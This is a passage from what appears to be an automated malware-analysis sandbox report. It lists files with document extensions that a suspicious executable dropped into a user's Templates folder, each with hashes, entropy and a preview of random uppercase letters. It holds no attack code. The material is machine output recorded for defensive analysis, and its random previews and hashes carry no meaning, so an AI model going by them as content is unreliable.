Preview:	DWTHNHNNJBNUOLHJSZISMDGJOYXTZZHUGXLVDUQRAEGRPGUJZOCKQITJDWWXLEKCBGNUXRHFKQNVYEOUAPWVUNRKEGOVRSMLUWJEDVYMGZNTPHFYBRBQKTDCSSUSYEFMSBVJIUZXBZTSOHJUGSMYXMCHCXFJRJWCIMIIBLQTYLCFAYBJJDFARAIASDNTGSCWOVPZQVOLZSDXHBWJKTFKDASDWBZAKTZORAZAYMGQAWYBXYSFHGIFDLGGWKOZHAKPMQDVATIAOQBMHQSPKRBCMODLQIXQPGYLUPHCCYRGFMMUNVADRWLBPHJTZMIBWBBNTGIKVBMISXLSCBVIJKSLAYUGSXYTWZXZEUNPSJHQDCYEUFAEFXVKTZLRWTCCBJEUMWRIOJQZDSKPYAXWZFFGELTRSKYQLZIJELZOOYTMOTXAVQFHZOTOYJRTETJWEYJSIKLGRPKHTDUAISIYRKTOTNIFBGJZDDLKNVDBWZPCZRBGCQVYWVVYPGSOJLVEEYAEGKNLGKHGWDNSTUBBACNMNKWHSEVSQQBPUBUQDPMAYUMOEKRDDULTRBJHROGAKDVOBRFGLXLEPPGPAOSMYHGQPLZVPJQPHVJECMGUAKGHDTRXXACRQCFVKNWHWLHHCPJPVQQVIJGFKFVKEZUOFIJPAGHPJNNXVXIPDRSYFAAUMDAXMMQYHYXSQCVGYKVCLTYUTCPZJEMADJIUEQIXZWEBGFSJRPNCJBGIRLATPCTHDDTOZYQETROWIDHELZOIYGROYRHTLACZEAAOGNJQWDLKLGFABXVJYRCNUWGFVDZUUJMAZAOCPBSGXKYOBTOFSVELAWARUWBQDAJUSVWCITXEQOPHLMEQQFXPPYDIRXJXPELMDYSPWTSNOQKFKNHOSIBCKLQWNBVVZSZKFPEPAAYEMUOZCVBZFPQTOSLEUQFOMZPXBRUFRPVLLIMOKJVZSYBIUFACEGBCKQVRWLXWDOKKECLVGPWOMOUDVXKXHIQF

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EFOYFBOLXA.docx

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EOWRVPQCCS.pdf

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692990330209164
Encrypted:	false
SSDEEP:	24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
MD5:	DD71B9C0322AD45992E56A9BCE43FE82
SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\EWZCVGNOWT.docx

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GIGIYTFFYT.pdf

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GLTYDMDUST.docx

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69569301223482
Encrypted:	false
SSDEEP:	24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
MD5:	CA404BEA65D84F58838AF73B2DC67E02
SHA1:	56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
SHA-256:	4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
SHA-512:	10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
Malicious:	false
Preview:	GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GNLQNHOLWB.xlsx

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698695541849584
Encrypted:	false
SSDEEP:	24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
MD5:	64E7020B0B401F75D3061A1917D99E04
SHA1:	785E09A2F76464E26CE282F41DE07D1B27FFB855
SHA-256:	9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
SHA-512:	14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
Malicious:	false
Preview:	GNLQNHOLWBOQVJIFTLNFGJNNXMGUZOMCUNVQXIPWIQSXJKHHVRYLBVHOHRRAZCZOOSABVUNECAWUZDTCLDYZAFJGGGUXKDFDPLZWHOYARDSHMWUJKNJPXNWQKOEVEVLWQLXKJLHTDQZQULYODUZGGIUHFXGBKGLAQBERUUCASFPJWCVSHYWEKXXBEZZVPBKVPPRGJJFXTGVBUVLUVQNAPBMPJOZNNFCDPEHNHWSMZSBAYITASRGZTGXSYUNNLKZKAVLGDGRIUVYOWINQLHMWTCZYYSGNSZQWZQNLKENKZJSDTJDSZVFQGHKVENDXCIHQVPCJNVXYVCJTKGGQJHTLGYJROSCXNGTCNNLCBSAOHAXWLQLCXTRIYCZVDEDWKBEHBEBKKXYVNQHTFFQFVFLHQRXMYLCHQAJKIRETOPSMFDVMJOROHVBDNWQMACXDCGCPKSQUIXWYXSYDPSBSUJMXEBPBCWJDOKOSFYRZQSCWEIHCQFTRYQVAUUYDVCYUHDRUKCTOGNWSTPHONXNHSHICTVCMWIDPOKQMNGFKZOADDJPTUVPEWWFNEKDLAVDZNBHHFIRSPGSQGUQUGGIRSVJTEIAUJEHUVHRJPWEMACBNRIWVFWWRDNGHYAESSKWHOCXLPYRMKQYTXSSYLKESQEPWVDSSTKTYQDQTTAUVWPQFTTJMGMEGRECDIFCMPKXTYYNGENSBDKEVPPDNRRDLULORZGHRQIQWLMHMKLKDLNSNWXWGTMDLMPWAGGPUJXOOYWOGWZTDKIVNNXMKJEFALSJECCOVZVTAPKGAXWCUMHLAHYBPLBTDXBKKPKPJFJOKZKMPEWOOMMMCZHSENRPGKEJJHHOVFETVBBFBTDTSNLGGPVPAFDOXRJUKYZTGOFQUAVOGUZJARUUCKMRYUSWZIRYUATBQRRVCNMFMMBTGSFQCAOTPTSBPCICPBMURXQOIITZCLXKSJVDGFLGHUIHTALRYCNLFILDCLQXDOGMOKPXT

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GRXZDKKVDB.docx

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697358951122591
Encrypted:	false
SSDEEP:	24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
MD5:	244A1B624BD2C9C3A0D660425CB1F3C6
SHA1:	FB6C19991CC49A27F0277F54D88B4522F479BE5F
SHA-256:	E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
SHA-512:	9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
Malicious:	false
Preview:	GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\GRXZDKKVDB.xlsx

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697358951122591
Encrypted:	false
SSDEEP:	24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
MD5:	244A1B624BD2C9C3A0D660425CB1F3C6
SHA1:	FB6C19991CC49A27F0277F54D88B4522F479BE5F
SHA-256:	E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
SHA-512:	9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
Malicious:	false
Preview:	GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\HVLFEFMHHB.pdf

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688192278065048
Encrypted:	false
SSDEEP:	24:QpAScqpJqU2M0r6gHGZdxsLVOo2qf4I5MRduGv:QPtbqE0r4xMZ2qf4X
MD5:	E6B83E7618DE7C60467C035027CADC38
SHA1:	7A0812266C40EAF0F9C8829B49E087AD90D94E9C
SHA-256:	8391D2A7645B06DDB986C1A54E0AED11D95709A36D069D086620E8826BC3A330
SHA-512:	C36C40C23B7859FC2B2F87A8EDFEF247C68BC561BA1482C67EF5581B562A2937B1699325B94D5FEFA6C871E03FFDF15F1A3DB50E4C320FB2AD1E632E0947FDCB
Malicious:	false
Preview:	HVLFEFMHHBAZDOLLZUNPNIMHDSYDQCISTUECHUCHKIAZZFSVBOELUIHPSHSXTNSPZDGIETMGXZOYQTZRMDJQFPHHJHCMEQAMYDDSLZLLUVDYXMVXMJISSAHCKPLCLDDBZUFIHVCCXHATRPSYNOHWXWJCDWDHDDSPCXHPEIXNETRDYBQVDZCZSCETYTSJIPSGEXYYNWAPSXUGLJGMVDMSILOBIVRFUBILUJUUFFXRNCZYXSQGJHKUDBDJGZWNGLJTNJADAFVOPOEFRDJKVPITPOGUIZYBSRBAAHELWONYMPDQZRAGDWEYGIKGSEGSKLXCRIXYVYCNLFAPZDPVJDSTOJJHRBYAFVUUHUPTGDCDAPEFBLYIAHZQXIZVAXOXOWQBKLVAPOMJLDTVBONRQXSZVABHXMVKXAHVBIWXPKRGZTDKAMPDAXSWNKCNNSMKKEECAANVALIIUEAXTYSXOKCYQYYXZTEBBANDVEICJYYAJPCRNGLJYSKLTEWKKIAXTZLKICCIAOQPAOQVEJXZPIYIXVSONSXMGRCKSVBNLNAKITKHATKVOAKZESLANUYNJSIOBTYYPZRGWXHMQEGVVXXRBNEVVYRTZWBSBZXBCTWATGHIYCHGUZXZLMYYHKVDAYMGQCLNOREHTSWUSWKHGEHRJJXNCAWTDRWOVTMGLOTCFSEWPQOLOOKFURNEANRYAOHFWBHJZKWTCLPCRLHHDVHKOLGCJQPRJFRUIBVIZISBXZQXHSJNMVPMLGKPIUUWWSDCKSOOKYNCPBNMWIEHWOTNUZYEZNJPVYKEUWDEEGMHFTVODLUKMYGXMOIQNSORSIJQDOIDNLRNHVCEAJNRJTMHQTNPWKWGMSDSPCXTWTIXGFTYXSNTASOZIBWKTZVHVXHWDZNBVOJXKIZAIZOUVEGBNGHYRGUKVNBWAJQMCAZRJGMOBMXLQXXVXCKJKYVDWBTSZUJDTZUKJCTZDHHLCOTJGUSHFTFJZNKKTJVWMSES

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\PALRGUCVEH.docx

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696508269038202
Encrypted:	false
SSDEEP:	24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
MD5:	0E9E92228B27AD7E7B4449467A529B0C
SHA1:	209F92CDFC879EE2B98DEF315CCE166AFEC00331
SHA-256:	284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
SHA-512:	CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
Malicious:	false
Preview:	PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBV